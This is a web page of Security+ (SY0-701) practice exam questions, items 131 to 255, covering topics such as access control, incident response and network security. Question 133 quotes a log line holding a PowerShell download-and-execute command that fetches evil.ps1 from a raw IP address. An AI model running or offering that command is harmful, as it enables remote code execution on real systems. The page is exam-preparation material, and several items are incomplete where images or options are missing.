Configure DLP to monitor staff who will be terminated.

D.

Raise awareness for business leaders on social engineering techniques.

Buy Now
Questions 131

Which of the following can a security director use to prioritize vulnerability patching within a company ' s IT environment?

Options:

A.

SOAR

B.

CVSS

C.

SIEM

D.

CVE

Buy Now
Questions 132

An organization has issues with deleted network share data and improper permissions. Which solution helps track and remediate these?

Options:

A.

DLP

B.

EDR

C.

FIM

D.

ACL

Buy Now
Questions 133

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

Options:

A.

System event logs

B.

EDR logs

C.

Firewall logs

D.

Application logs

Buy Now
Questions 134

A company wants to use new Wi-Fi-enabled environmental sensors to automatically collect metrics. Which of the following will the security team most likely do?

Options:

A.

Add the sensor software to the risk register.

B.

Create a VLAN for the sensors.

C.

Physically air gap the sensors.

D.

Configure TLS 1.2 on all sensors.

Buy Now
Questions 135

After a security awareness training session, a user called the IT help desk and reported a suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card information in order to close an invoice. Which of the following topics did the user recognize from the training?

Options:

A.

Insider threat

B.

Email phishing

C.

Social engineering

D.

Executive whaling

Buy Now
Questions 136

A security engineer receives reports of unauthorized devices on the organization ' s network. Which of the following best describes a secure and effective way to mitigate the risks?

Options:

A.

Deploy a NAC solution to block wireless connections until devices can be verified against the baseline configuration.

B.

Set the NAC solution to only accept handshakes initiated from a static set of IP addresses.

C.

Configure a NAC solution to enforce 802.1X authentication with device certificates and implement endpoint security checks.

D.

Implement a NAC solution that redirects all devices to the guest Wi-Fi for holding until a security analyst can validate the security compliance.

Buy Now
Questions 137

Which of the following would a systems administrator follow when upgrading the firmware of an organization ' s router?

Options:

A.

Software development life cycle

B.

Risk tolerance

C.

Certificate signing request

D.

Maintenance window

Buy Now
Questions 138

A systems administrator uses deception techniques to help detect and study attacks within a network. The administrator deploys a document filled with fake passwords and customer payment information. Which of the following techniques is the administrator using?

Options:

A.

Honeytoken

B.

Honeypot

C.

Honeyfile

D.

Honeynet

Buy Now
Questions 139

An organization has learned that its data is being exchanged on the dark web. The CIO

has requested that you investigate and implement the most secure solution to protect employee accounts.

INSTRUCTIONS

Review the data to identify weak security practices and provide the most appropriate

security solution to meet the CIO ' s requirements.

SY0-701 Question 139

Options:

Buy Now
Questions 140

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

Options:

A.

Air gap the system.

B.

Move the system to a different network segment.

C.

Create a change control request.

D.

Apply the patch to the system.

Buy Now
Questions 141

Which of the following is a prerequisite for a DLP solution?

Options:

A.

Data destruction

B.

Data sanitization

C.

Data classification

D.

Data masking

Buy Now
Questions 142

Which of the following best explains why an organization would choose a warm site for disaster recovery?

Options:

A.

It reduces complexity by replicating data in real time across identical environments.

B.

It eliminates the need for backup testing by using cloud-native infrastructure.

C.

It offers fully automated fail over with no manual intervention required.

D.

It balances cost and recovery time by maintaining partially configured systems.

Buy Now
Questions 143

In a rush to meet an end-of-year business goal, the IT department was told to implement a new business application. The security engineer reviews the attributes of the application and decides the time needed to perform due diligence is insufficient from a cybersecurity perspective. Which of the following best describes the security engineer ' s response?

Options:

A.

Risk tolerance

B.

Risk acceptance

C.

Risk importance

D.

Risk appetite

Buy Now
Questions 144

A security audit of an organization revealed that most of the IT staff members have domain administrator credentials and do not change the passwords regularly. Which of the following solutions should the security learn propose to resolve the findings in the most complete way?

Options:

A.

Creating group policies to enforce password rotation on domain administrator credentials

B.

Reviewing the domain administrator group, removing all unnecessary administrators, and rotating all passwords

C.

Integrating the domain administrator ' s group with an IdP and requiring SSO with MFA for all access

D.

Securing domain administrator credentials in a PAM vault and controlling access with role-based access control

Buy Now
Questions 145

A systems administrator creates a script that validates OS version, patch levels, and installed applications when users log in. Which of the following examples best describes the purpose of this script?

Options:

A.

Resource scaling

B.

Policy enumeration

C.

Baseline enforcement

D.

Guardrails implementation

Buy Now
Questions 146

Which of the following describes the maximum allowance of accepted risk?

Options:

A.

Risk indicator

B.

Risk level

C.

Risk score

D.

Risk threshold

Buy Now
Questions 147

A company implemented an MDM policy 10 mitigate risks after repealed instances of employees losing company-provided mobile phones. In several cases. The lost phones were used maliciously to perform social engineering attacks against other employees. Which of the following MDM features should be configured to best address this issue? (Select two).

Options:

A.

Screen locks

B.

Remote wipe

C.

Full device encryption

D.

Push notifications

E.

Application management

F.

Geolocation

Buy Now
Questions 148

As part of new compliance audit requirements, multiple servers need to be segmented on different networks and should be reachable only from authorized internal systems. Which of the following would meet the requirements?

Options:

A.

Configure firewall rules to block external access to Internal resources.

B.

Set up a WAP to allow internal access from public networks.

C.

Implement a new IPSec tunnel from internal resources.

D.

Deploy an Internal Jump server to access resources.

Buy Now
Questions 149

A penetration tester is testing the security of a building’s alarm system. Which type of penetration test is being conducted?

Options:

A.

Physical

B.

Defensive

C.

Integrated

D.

Continuous

Buy Now
Questions 150

Which of the following is the most likely reason a security analyst would review SIEM logs?

Options:

A.

To check for recent password reset attempts

B.

To monitor for potential DDoS attacks

C.

To assess the scope of a privacy breach

D.

To see correlations across multiple hosts

Buy Now
Questions 151

Which of the following agreements defines response time, escalation, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Buy Now
Questions 152

Which of the following is the most effective way to protect an application server running software that is no longer supported from network threats?

Options:

A.

Air gap

B.

Barricade

C.

Port security

D.

Screen subnet

Buy Now
Questions 153

Which of the following is the most likely motivation for a hacktivist?

Options:

A.

Financial gain

B.

Service disruption

C.

Philosophical beliefs

D.

Corporate espionage

Buy Now
Questions 154

A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring?

Options:

A.

A worm is propagating across the network.

B.

Data is being exfiltrated.

C.

A logic bomb is deleting data.

D.

Ransomware is encrypting files.

Buy Now
Questions 155

A security administrator receives multiple reports about the same suspicious email. Which of the following is the most likely reason for the malicious email ' s continued delivery?

Options:

A.

Employees are flagging legitimate emails as spam.

B.

Information from reported emails is not being used to tune email filtering tools.

C.

Employees are using shadow IT solutions for email.

D.

Employees are forwarding personal emails to company email addresses.

Buy Now
Questions 156

Which of the following actions must an organization take to comply with a person ' s request for the right to be forgotten?

Options:

A.

Purge all personally identifiable attributes.

B.

Encrypt all of the data.

C.

Remove all of the person’s data.

D.

Obfuscate all of the person’s data.

Buy Now
Questions 157

A systems administrator is looking for a low-cost application-hosting solution that is cloud-based. Which of the following meets these requirements?

Options:

A.

Serverless framework

B.

Type 1 hvpervisor

C.

SD-WAN

D.

SDN

Buy Now
Questions 158

Which of the following actors attacking an organization is the most likely to be motivated by personal beliefs?

Options:

A.

Nation-state

B.

Organized crime

C.

Hacktvist

D.

Insider threat

Buy Now
Questions 159

An organization recently updated its security policy to include the following statement:

Regular expressions are included in source code to remove special characters such as $, |, ;. & , `, and ? from variables set by forms in a web application.

Which of the following best explains the security technique the organization adopted by making this addition to the policy?

Options:

A.

Identify embedded keys

B.

Code debugging

C.

Input validation

D.

Static code analysis

Buy Now
Questions 160

An unexpected and out-of-character email message from a Chief Executive Officer’s corporate account asked an employee to provide financial information and to change the recipient ' s contact number. Which of the following attack vectors is most likely being used?

Options:

A.

Business email compromise

B.

Phishing

C.

Brand impersonation

D.

Pretexting

Buy Now
Questions 161

An organization has a new regulatory requirement to implement corrective controls on a financial system. Which of the following is the most likely reason for the new requirement?

Options:

A.

To defend against insider threats altering banking details

B.

To ensure that errors are not passed to other systems

C.

To allow for business insurance to be purchased

D.

To prevent unauthorized changes to financial data

Buy Now
Questions 162

Which of the following allows a systems administrator to tune permissions for a file?

Options:

A.

Patching

B.

Access control list

C.

Configuration enforcement

D.

Least privilege

Buy Now
Questions 163

Which of the following actions best addresses a vulnerability found on a company ' s web server?

Options:

A.

Patching

B.

Segmentation

C.

Decommissioning

D.

Monitoring

Buy Now
Questions 164

An administrator discovers that some files on a database server were recently encrypted. The administrator sees from the security logs that the data was last accessed by a domain user. Which of the following best describes the type of attack that occurred?

Options:

A.

Insider threat

B.

Social engineering

C.

Watering-hole

D.

Unauthorized attacker

Buy Now
Questions 165

Which of the following can be used to identify potential attacker activities without affecting production servers?

Options:

A.

Honey pot

B.

Video surveillance

C.

Zero Trust

D.

Geofencing

Buy Now
Questions 166

The security team at a large global company needs to reduce the cost of storing data used for performing investigations. Which of the following types of data should have its retention length reduced?

Options:

A.

Packet capture

B.

Endpoint logs

C.

OS security logs

D.

Vulnerability scan

Buy Now
Questions 167

Which of the following should an organization use to protect its environment from external attacks conducted by an unauthorized hacker?

Options:

A.

ACL

B.

IDS

C.

HIDS

D.

NIPS

Buy Now
Questions 168

The management team notices that new accounts that are set up manually do not always have correct access or permissions.

Which of the following automation techniques should a systems administrator use to streamline account creation?

Options:

A.

Guard rail script

B.

Ticketing workflow

C.

Escalation script

D.

User provisioning script

Buy Now
Questions 169

A security team created a document that details the order in which critical systems should be through back online after a major outage. Which of the following documents did the team create?

Options:

A.

Communication plan

B.

Incident response plan

C.

Data retention policy

D.

Disaster recovery plan

Buy Now
Questions 170

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device.

Which of the following best describes the user’s activity?

Options:

A.

Penetration testing

B.

Phishing campaign

C.

External audit

D.

Insider threat

Buy Now
Questions 171

A company wants to protect a specialized legacy platform that controls the physical flow of gas inside of pipes. Which of the following environments does the company need to secure to best achieve this goal?

Options:

A.

IaaS

B.

SCADA

C.

SDN

D.

IoT

Buy Now
Questions 172

Which of the following would a security administrator use to comply with a secure baseline during a patch update?

Options:

A.

Information security policy

B.

Service-level expectations

C.

Standard operating procedure

D.

Test result report

Buy Now
Questions 173

Which of the following is a benefit of an RTO when conducting a business impact analysis?

Options:

A.

It determines the likelihood of an incident and its cost.

B.

It determines the roles and responsibilities for incident responders.

C.

It determines the state that systems should be restored to following an incident.

D.

It determines how long an organization can tolerate downtime after an incident.

Buy Now
Questions 174

Which of the following are the best for hardening end-user devices? (Selecttwo)

Options:

A.

Full disk encryption

B.

Group-level permissions

C.

Account lockout

D.

Endpoint protection

E.

Proxy server

F.

Segmentation

Buy Now
Questions 175

Which of the following would best prepare a security team for a specific incident response scenario?

Options:

A.

Situational awareness

B.

Risk assessment

C.

Root cause analysis

D.

Tabletop exercise

Buy Now
Questions 176

A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system. Which of the following would detect this behavior?

Options:

A.

Implementing encryption

B.

Monitoring outbound traffic

C.

Using default settings

D.

Closing all open ports

Buy Now
Questions 177

A company ' s antivirus solution is effective in blocking malware but often has false positives. The security team has spent a significant amount of time on investigations but cannot determine a root cause. The company is looking for a heuristic solution. Which of the following should replace the antivirus solution?

Options:

A.

SIEM

B.

EDR

C.

DLP

D.

IDS

Buy Now
Questions 178

A security analyst is reviewing logs and discovers the following:

SY0-701 Question 178

Which of the following should be used lo best mitigate this type of attack?

Options:

A.

Input sanitization

B.

Secure cookies

C.

Static code analysis

D.

Sandboxing

Buy Now
Questions 179

A network administrator deploys an FDE solution on all end user workstations. Which of the following data protection strategies does this describe?

Options:

A.

Masking

B.

Data in transit

C.

Obfuscation

D.

Data at rest

E.

Data sovereignty

Buy Now
Questions 180

An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five years. A few weeks after the employee resigned. one of the batch jobs talked and caused a major disruption. Which of the following would work best to prevent this type of incident from reoccurring?

Options:

A.

Job rotation

B.

Retention

C.

Outsourcing

D.

Separation of duties

Buy Now
Questions 181

Which of the following data types relates to data sovereignty?

Options:

A.

Data classified as public in other countries

B.

Personally Identifiable data while traveling

C.

Health data shared between doctors in other nations

D.

Data at rest outside of a country ' s borders

Buy Now
Questions 182

Which of the following should a security administrator adhere to when setting up a new set of firewall rules?

Options:

A.

Disaster recovery plan

B.

Incident response procedure

C.

Business continuity plan

D.

Change management procedure

Buy Now
Questions 183

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Which of the following would be a good use case for this task?

Options:

A.

Off-the-shelf software

B.

Orchestration

C.

Baseline

D.

Policy enforcement

Buy Now
Questions 184

A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager should take?

Options:

A.

Set the maximum data retention policy.

B.

Securely store the documents on an air-gapped network.

C.

Review the documents ' data classification policy.

D.

Conduct a tabletop exercise with the team.

Buy Now
Questions 185

While considering the organization ' s cloud-adoption strategy, the Chief Information Security Officer sets a goal to outsource patching of firmware, operating systems, and applications to the chosen cloud vendor. Which of the following best meets this goal?

Options:

A.

Community cloud

B.

PaaS

C.

Containerization

D.

Private cloud

E.

SaaS

F.

laaS

Buy Now
Questions 186

A client demands at least 99.99% uptime from a service provider ' s hosted security services. Which of the following documents includes the information the service provider should return to the client?

Options:

A.

MOA

B.

SOW

C.

MOU

D.

SLA

Buy Now
Questions 187

Which of the following describes the reason root cause analysis should be conducted as part of incident response?

Options:

A.

To gather loCs for the investigation

B.

To discover which systems have been affected

C.

To eradicate any trace of malware on the network

D.

To prevent future incidents of the same nature

Buy Now
Questions 188

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

Options:

A.

Private

B.

Critical

C.

Sensitive

D.

Public

Buy Now
Questions 189

Which of the following is a vulnerability concern for end-of-life hardware?

Options:

A.

Failure to follow hardware disposal procedures could result in unintended data release.

B.

The supply chain may not have replacement hardware.

C.

Newly released software may require computing resources not available on legacy hardware.

D.

The vendor may stop providing patches and updates.

Buy Now
Questions 190

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered by an employee who attempted to download a file. Which of the following is the most likely reason the download was blocked?

Options:

A.

A misconfiguration in the endpoint protection software

B.

A zero-day vulnerability in the file

C.

A supply chain attack on the endpoint protection vendor

D.

Incorrect file permissions

Buy Now
Questions 191

A security report shows that during a two-week test period. 80% of employees unwittingly disclosed their SSO credentials when accessing an external website. The organization purposelycreated the website to simulate a cost-free password complexity test. Which of the following would best help reduce the number of visits to similar websites in the future?

Options:

A.

Block all outbound traffic from the intranet.

B.

Introduce a campaign to recognize phishing attempts.

C.

Restrict internet access for the employees who disclosed credentials.

D.

Implement a deny list of websites.

Buy Now
Questions 192

Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?

Options:

A.

Degaussing

B.

Drive shredder

C.

Retention platform

D.

Wipe tool

Buy Now
Questions 193

A company wants to update its disaster recovery plan to include a dedicated location for immediate continued operations if a catastrophic event occurs. Which of the following options is best to include in the disaster recovery plan?

Options:

A.

Hot site

B.

Warm site

C.

Geolocation

D.

Cold site

Buy Now
Questions 194

A store is setting up wireless access for employees. Management wants to limit the number of access points while ensuring full coverage. Which tool will help determine how many access points are needed?

Options:

A.

Signal locator

B.

WPA3

C.

Heat map

D.

Site survey

Buy Now
Questions 195

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Oncethe password is created, the company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user ' s intranet account? (Select two).

Options:

A.

Federation

B.

Identity proofing

C.

Password complexity

D.

Default password changes

E.

Password manager

F.

Open authentication

Buy Now
Questions 196

A security officer is implementing a security awareness program and is placing security-themed posters around the building and is assigning online user training. Which of the following would the security officer most likely implement?

Options:

A.

Password policy

B.

Access badges

C.

Phishing campaign

D.

Risk assessment

Buy Now
Questions 197

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?

Options:

A.

ACL

B.

DLP

C.

IDS

D.

IPS

Buy Now
Questions 198

An important patch for a critical application has just been released, and a systems administrator is identifying all of the systems requiring the patch. Which of the following must be maintained in order to ensure that all systems requiring the patch are updated?

Options:

A.

Asset inventory

B.

Network enumeration

C.

Data certification

D.

Procurement process

Buy Now
Questions 199

Which of the following is an example of a false negative vulnerability detection in a scan report?

Options:

A.

A vulnerability that does not actually exist

B.

A vulnerability that has already been remediated

C.

A result that shows no known vulnerability

D.

A zero-day vulnerability with a known remediation

Buy Now
Questions 200

A program manager wants to ensure contract employees can only use the company’s computers Monday through Friday from 9 a.m. to 5 p.m. Which of the following would best enforce this access control?

Options:

A.

Creating a GPO for all contract employees and setting time-of-day log-in restrictions

B.

Creating a discretionary access policy and setting rule-based access for contract employees

C.

Implementing an OAuth server and then setting least privilege for contract employees

D.

Implementing SAML with federation to the contract employees ' authentication server

Buy Now
Questions 201

A network security analyst monitors the network’s IDS, which has flagged unusual activity. The IDS has detected multiple login attempts to a database server within a short period. These attempts come from various IP addresses that are not normally recognized by the network’s usual traffic patterns. Each attempt uses the same username and password. Based on the following log output (corrected formatting for readability):

2025-04-10 14:22:01.4532 — Source IP: 192.168.15.101 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:02.1122 — Source IP: 192.168.15.102 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:02.7835 — Source IP: 192.168.15.103 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:03.5637 — Source IP: 192.168.15.104 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:04.9474 — Source IP: 192.168.15.105 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:05.5673 — Source IP: 192.168.15.106 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:06.1573 — Source IP: 192.168.15.107 — Status: Failed — User: JDoe — Action: Login Attempt

2025-04-10 14:22:07.7462 — Source IP: 192.168.15.108 — Status: Failed — User: JDoe — Action: Login Attempt

Which of the following types of network attacks is most likely occurring?

Options:

A.

Cross-site scripting

B.

Credential replay

C.

Distributed denial of service

D.

SQL injection

Buy Now
Questions 202

A security analyst is reviewing the following logs about a suspicious activity alert for a user ' s VPN log-ins. Which of the following malicious activity indicators triggered the alert?

✅Log Summary:

User logs in fromChicago, ILmultiple times, then suddenly a successful login appears fromRome, Italy, followed again by Chicago logins — all within ashort time span.

Options:

A.

Impossible travel

B.

Account lockout

C.

Blocked content

D.

Concurrent session usage

Buy Now
Questions 203

Which of the following describes the difference between encryption and hashing?

Options:

A.

Encryption protects data in transit, while hashing protects data at rest.

B.

Encryption replaces cleartext with ciphertext, while hashing calculates a checksum.

C.

Encryption ensures data integrity, while hashing ensures data confidentiality.

D.

Encryption uses a public-key exchange, while hashing uses a private key.

Buy Now
Questions 204

A security administrator is implementing encryption on all hard drives in an organization. Which of the following security concepts is the administrator applying?

Options:

A.

Integrity

B.

Authentication

C.

Zero Trust

D.

Confidentiality

Buy Now
Questions 205

A company hired a consultant to perform an offensive security assessment covering penetration testing and social engineering.

Which of the following teams will conduct this assessment activity?

Options:

A.

White

B.

Purple

C.

Blue

D.

Red

Buy Now
Questions 206

Which of the following involves an attempt to take advantage of database misconfigurations?

Options:

A.

Buffer overflow

B.

SQL injection

C.

VM escape

D.

Memory injection

Buy Now
Questions 207

Which of the following uses proprietary controls and is designed to function in harsh environments over many years with limited remote access management?

Options:

A.

ICS

B.

Microservers

C.

Containers

D.

IoT

Buy Now
Questions 208

Which of the following is the final step of the modem response process?

Options:

A.

Lessons learned

B.

Eradication

C.

Containment

D.

Recovery

Buy Now
Questions 209

An administrator wants to automate an account permissions update for a large number of accounts. Which of the following would best accomplish this task?

Options:

A.

Security groups

B.

Federation

C.

User provisioning

D.

Vertical scaling

Buy Now
Questions 210

Which of the following is used to protect a computer from viruses, malware, and Trojans being installed and moving laterally across the network?

Options:

A.

IDS

B.

ACL

C.

EDR

D.

NAC

Buy Now
Questions 211

Which of the following should a security team do first before a new web server goes live?

Options:

A.

Harden the virtual host.

B.

Create WAF rules.

C.

Enable network intrusion detection.

D.

Apply patch management

Buy Now
Questions 212

An attacker used XSS to compromise a web server. Which of the following solutions could have been used to prevent this attack?

Options:

A.

NGFW

B.

UTM

C.

WAF

D.

NAC

Buy Now
Questions 213

A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?

Options:

A.

Patch availability

B.

Product software compatibility

C.

Ease of recovery

D.

Cost of replacement

Buy Now
Questions 214

A few weeks after deploying additional email servers, employees complain that messages are being marked as spam. Which needs to be updated?

Options:

A.

CNAME

B.

SMTP

C.

DLP

D.

SPF

Buy Now
Questions 215

An accountant is transferring information to a bank over FTP. Which of the following mitigations should the accountant use to protect the confidentiality of the data?

Options:

A.

Tokenization

B.

Data masking

C.

Encryption

D.

Obfuscation

Buy Now
Questions 216

While troubleshooting an internal resource ' s poor performance for an end user, a network engineer performs a traceroute on the end device and receives the following output:

C:\User > tracert 10.100.15.20

Tracing route to [internal.resource.org] 10.100.15.20

over a maximum of 30 hops:

1 200 ms 200 ms 200 ms 10.20.10.10

2 5 ms 3 ms 3 ms 10.20.10.1

3 20 ms 20 ms 10 ms 10.25.10.10

4 10 ms 8 ms 10 ms 10.30.110.1

5 5 ms 6 ms 3 ms 10.100.15.20

The engineer performs a traceroute from a device that is not experiencing poor performance but is connected to the same port. The engineer receives the following output:

C:\Engineer > tracert 10.100.15.20

Tracing route to [internal.resource.org] 10.100.15.20

over a maximum of 30 hops:

1 5 ms 3 ms 3 ms 10.20.10.1

2 20 ms 20 ms 10 ms 10.25.10.10

3 10 ms 8 ms 10 ms 10.30.110.1

4 5 ms 6 ms 3 ms 10.100.15.20

Which of the following is most likely occurring?

Options:

A.

ARP cache poisoning

B.

On-path attack

C.

Resource exhaustion

D.

DNS spoofing

Buy Now
Questions 217

In order to strengthen a password and prevent a hacker from cracking it, a random string of 36 characters was added to the password. Which of the following best describes this technique?

Options:

A.

Key stretching

B.

Tokenization

C.

Data masking

D.

Salting

Buy Now
Questions 218

Which of the following activities uses OSINT?

Options:

A.

Social engineering testing

B.

Data analysis of logs

C.

Collecting evidence of malicious activity

D.

Producing IOC for malicious artifacts

Buy Now
Questions 219

A company wants to reduce the time and expense associated with code deployment. Which of the following technologies should the company utilize?

Options:

A.

Serverless architecture

B.

Thin clients

C.

Private cloud

D.

Virtual machines

Buy Now
Questions 220

Which of the following best describe a penetration test that resembles an actual external attach?

Options:

A.

Known environment

B.

Partially known environment

C.

Bug bounty

D.

Unknown environment

Buy Now
Questions 221

An organization wants to improve the company ' s security authentication method for remote employees. Given the following requirements:

• Must work across SaaS and internal network applications

• Must be device manufacturer agnostic

• Must have offline capabilities

Which of the following would be the most appropriate authentication method?

Options:

A.

Username and password

B.

Biometrics

C.

SMS verification

D.

Time-based tokens

Buy Now
Questions 222

Which of the following security concepts is accomplished when granting access after an individual has logged into a computer network?

Options:

A.

Authorization

B.

Identification

C.

Non-repudiation

D.

Authentication

Buy Now
Questions 223

Which of the following is the main consideration when a legacy system that is a critical part of a company ' s infrastructure cannot be replaced?

Options:

A.

Resource provisioning

B.

Cost

C.

Single point of failure

D.

Complexity

Buy Now
Questions 224

During a routine audit, an analyst discovers that a department at a high school uses a simulation program that was not properly vetted before deployment. Which of the following threats is this an example of?

Options:

Buy Now
Questions 225

An employee used a company ' s billing system to issue fraudulent checks. The administrator is looking for evidence of other occurrences of this activity. Which of the following should the administrator examine?

Options:

A.

Application logs

B.

Vulnerability scanner logs

C.

IDS/IPS logs

D.

Firewall logs

Buy Now
Questions 226

A company is developing a critical system for the government and storing project information on a fileshare. Which of the following describes how this data will most likely be classified? (Select two).

Options:

A.

Private

B.

Confidential

C.

Public

D.

Operational

E.

Urgent

F.

Restricted

Buy Now
Questions 227

An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users’ passwords. Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?

Options:

A.

Multifactor authentication

B.

Permissions assignment

C.

Access management

D.

Password complexity

Buy Now
Questions 228

A security manager wants to reduce the number of steps required to identify and contain basic threats. Which of the following will help achieve this goal?

Options:

A.

SOAR

B.

SIEM

C.

DMARC

D.

NIDS

Buy Now
Questions 229

A company is in the process of cutting jobs to manage costs. The Chief Information Security Officer is concerned about the increased risk of an insider threat. Which of the following would most likely help the security awareness team address this potential threat?

Options:

A.

Immediately disable the accounts of staff who are likely to be terminated.

B.

Train supervisors to identify and manage disgruntled employees.

C.

Configure DLP to monitor staff who will be terminated.

D.

Raise awareness for business leaders on social engineering techniques.

Buy Now
Questions 230

A security analyst identifies an incident in the network. Which of the following incident response activities would the security analyst perform next?

Options:

A.

Containment

B.

Detection

C.

Eradication

D.

Recovery

Buy Now
Questions 231

An administrator investigating an incident is concerned about the downtime of a critical server due to a failed drive. Which of the following would the administrator use to estimate the time needed to fix the issue?

Options:

A.

MTTR

B.

MTBF

C.

RTO

D.

RPO

Buy Now
Questions 232

Which of the following digital forensics activities would a security team perform when responding to legal requests in a pending investigation?

Options:

A.

E-discovery

B.

User provisioning

C.

Firewall log export

D.

Root cause analysis

Buy Now
Questions 233

Which of the following would be best suited for constantly changing environments?

Options:

A.

RTOS

B.

Containers

C.

Embedded systems

D.

SCADA

Buy Now
Questions 234

Which of the following is the most likely to be included as an element of communication in a security awareness program?

Options:

A.

Reporting phishing attempts or other suspicious activities

B.

Detecting insider threats using anomalous behavior recognition

C.

Verifying information when modifying wire transfer data

D.

Performing social engineering as part of third-party penetration testing

Buy Now
Questions 235

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PII?

Options:

A.

SCAP

B.

Net Flow

C.

Antivirus

D.

DLP

Buy Now
Questions 236

An administrator at a small business notices an increase in support calls from employees who receive a blocked page message after trying to navigate to a spoofed website. Which of the following should the administrator do?

Options:

A.

Deploy multifactor authentication.

B.

Decrease the level of the web filter settings

C.

Implement security awareness training.

D.

Update the acceptable use policy

Buy Now
Questions 237

Which of the following alert types is the most likely to be ignored over time?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Buy Now
Questions 238

A company deploys a new server that a client must be able to access it at all times. Which of the following will support this availability requirement?

Options:

A.

Proxy server

B.

Jump server

C.

Geographic restrictions

D.

Load balancer

Buy Now
Questions 239

Which of the following most accurately describes the order in which a security engineer should implement secure baselines?

Options:

A.

Deploy, maintain, establish

B.

Establish, maintain, deploy

C.

Establish, deploy, maintain

D.

Deploy, establish, maintain

Buy Now
Questions 240

A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will help the company achieve this goal?

Options:

A.

Internal self-assessment

B.

Active reconnaissance

C.

Red team penetration test

D.

Tabletop exercise

Buy Now
Questions 241

An organization has too many variations of a single operating system and needs to standardize the arrangement prior to pushing the system image to users. Which of the following should the organization implement first?

Options:

A.

Standard naming convention

B.

Mashing

C.

Network diagrams

D.

Baseline configuration

Buy Now
Questions 242

Which of the following technologies can achieve microsegmentation?

Options:

A.

Next-generation firewalls

B.

Software-defined networking

C.

Embedded systems

D.

Air-gapped

Buy Now
Questions 243

A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure that a user cannot deny that they sent the email?

Options:

A.

Non-repudiation

B.

Confidentiality

C.

Integrity

D.

Authentication

Buy Now
Questions 244

Which of the following is a key reason to follow data retention policies during asset decommissioning?

Options:

A.

To ensure data is securely destroyed when no longer needed

B.

To make backup copies of all company data before disposing of hardware

C.

To allow employees to access old files even after the hardware is recycled

D.

To keep all customer data available in case it is required in the future

Buy Now
Questions 245

A cybersecurity incident response team at a large company receives notification that malware is present on several corporate desktops No known Indicators of compromise have been found on the network. Which of the following should the team do first to secure the environment?

Options:

A.

Contain the Impacted hosts

B.

Add the malware to the application blocklist.

C.

Segment the core database server.

D.

Implement firewall rules to block outbound beaconing

Buy Now
Questions 246

Which of the following are the most important considerations when encrypting data? (Select two).

Options:

A.

Obfuscation

B.

Algorithms

C.

Data masking

D.

Key length

E.

Tokenization

F.

Salting

Buy Now
Questions 247

A systems administrator receives an alert that a company ' s internal file server is very slow and is only working intermittently. The systems administrator reviews the server management software and finds the following information about the server:

SY0-701 Question 247

Which of the following indicators most likely triggered this alert?

Options:

A.

Concurrent session usage

B.

Network saturation

C.

Account lockout

D.

Resource consumption

Buy Now
Questions 248

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).

Options:

A.

Application

B.

Authentication

C.

DHCP

D.

Network

E.

Firewall

F.

Database

Buy Now
Questions 249

The Chief Information Security Officer of an organization needs to ensure recovery from ransomware would likely occur within the organization ' s agreed-upon RPOs end RTOs. Which of the following backup scenarios would best ensure recovery?

Options:

A.

Hourly differential backups stored on a local SAN array

B.

Dally full backups stored on premises in magnetic offline media

C.

Daly differential backups maintained by a third-party cloud provider

D.

Weekly full backups with daily incremental stored on a NAS drive

Buy Now
Questions 250

An organization experiences a compromise in a cloud-hosted solution that contains customer information. Which of the following strategies will help determine the sensitivity level of the breach?

Options:

A.

Permission restrictions

B.

Tabletop exercise

C.

Data classification

D.

Asset inventory

Buy Now
Questions 251

Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?

Options:

A.

SIEM

B.

WAF

C.

Network taps

D.

IDS

Buy Now
Questions 252

Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?

Options:

A.

Exposure factor

B.

CVSS

C.

CVE

D.

Industry impact

Buy Now
Questions 253

A company wants to improve the availability of its application with a solution that requires minimal effort in the event a server needs to be replaced or added. Which of the following would be the best solution to meet these objectives?

Options:

A.

Load balancing

B.

Fault tolerance

C.

Proxy servers

D.

Replication

Buy Now
Questions 254

Which of the following activities should be included as part of passive reconnaissance in a penetration test?

Options:

A.

Domain Name System (DNS) zone transfer

B.

Vulnerability scanning

C.

Social engineering

D.

Google hacking

Buy Now
Questions 255

